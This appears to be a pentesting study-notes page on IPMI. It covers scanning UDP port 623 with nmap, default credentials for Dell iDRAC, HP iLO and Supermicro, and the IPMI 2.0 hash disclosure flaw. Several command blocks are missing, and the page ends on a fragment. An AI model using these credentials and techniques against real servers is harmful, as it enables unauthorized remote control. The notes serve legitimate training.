search
inHTBTHM
githubEdit

IPMI

hashtag
What is IPMI?

  • IPMI is a hardware-based management system used for monitoring and remote management of servers, even if they are powered off or unresponsive.

  • It works independently from the OS, BIOS, and CPU.

  • Commonly found in Cisco, Dell, HP, Supermicro, and other enterprise servers.

hashtag
πŸ”Ή How IPMI Works?

IPMI is used for:

1️⃣ Before OS boot – Modify BIOS settings.

2️⃣ When the system is powered off – Remote control & monitoring.

3️⃣ After system failure – Debugging & recovery.

It monitors temperature, voltage, fan status, power supply, and allows remote upgrades.

hashtag
πŸ”Ή Scanning for IPMI Services

hashtag
Nmap Scan

IPMI uses UDP port 623. To check if it is open:

sudo nmap -sU --script ipmi-version -p 623 <target-IP>

Example Output:

PORT    STATE SERVICE
623/udp open  asf-rmcp
| ipmi-version:
|   Version: IPMI-2.0
|   UserAuth: auth_user, non_null_user
|   PassAuth: password, md5, null

hashtag
πŸ“Œ Metasploit Scan

Metasploit has an IPMI version scanner:

hashtag
πŸ”Ή Default Credentials in IPMI

Many servers have default credentials that are rarely changed:

Product

Username

Password

Dell iDRAC

root

calvin

HP iLO

Administrator

Random (8-char)

Supermicro

ADMIN

ADMIN

Try default passwords first. If they work, you have full control!

hashtag
πŸ”Ή Exploiting IPMI Hash Disclosure

IPMI 2.0 has a flaw where it sends password hashes before authentication!

hashtag
πŸ“Œ Dumping Hashes with Metasploit

Example Output:

hashtag
πŸ“Œ Cracking IPMI Hashes with Hashcat

If HP iLO uses a factory default password, try:

This tests all uppercase letters & numbers (HP’s default format).

hashtag
πŸ”Ή Why is IPMI Dangerous?

  • If an attacker gains access to IPMI credentials, they can: βœ… Reboot or power off servers remotely. βœ… Modify BIOS settings and boot custom OS images. βœ… Install malware or persistent backdoors. βœ… Perform remote code execution on the server.

then broken hash

PreviousOracle TNSNextSSH

Last updated